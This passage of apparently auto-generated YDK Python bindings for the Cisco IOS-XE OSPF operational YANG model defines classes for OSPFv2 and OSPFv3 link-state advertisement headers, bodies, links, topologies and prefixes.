"area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = 
True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. 
attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class LinkScopeLsas(Entity): """ List OSPF link scope LSA .. attribute:: lsa_type (key) OSPF link scope LSA type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_scope_lsa List of OSPF link scope LSAs **type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa>` **config**\: False .. 
attribute:: area_scope_lsa List OSPF area scope LSA databases **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__() self.yang_name = "link-scope-lsas" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): """ List of OSPF link scope LSAs .. attribute:: lsa_id (key) LSA ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: version Version **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link OSPFv2 LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv2_unknown_tlv OSPFv2 Unknown TLV **type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>` **config**\: False .. attribute:: ospfv3_lsa_val OSPFv3 LSA **type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link>` **config**\: False .. 
attribute:: ospfv3_prefix_list OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>` **config**\: False .. attribute:: multi_topology OSPF multi\-topology interface augmentation **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology>` **config**\: False .. attribute:: router_address Router address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: tlv Link TLV **type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv>` **config**\: False .. 
attribute:: unknown_sub_tlv OSPFv2 Unknown sub TLV **type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", 
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. 
attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', 
(YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. 
attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ OSPFv2 LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
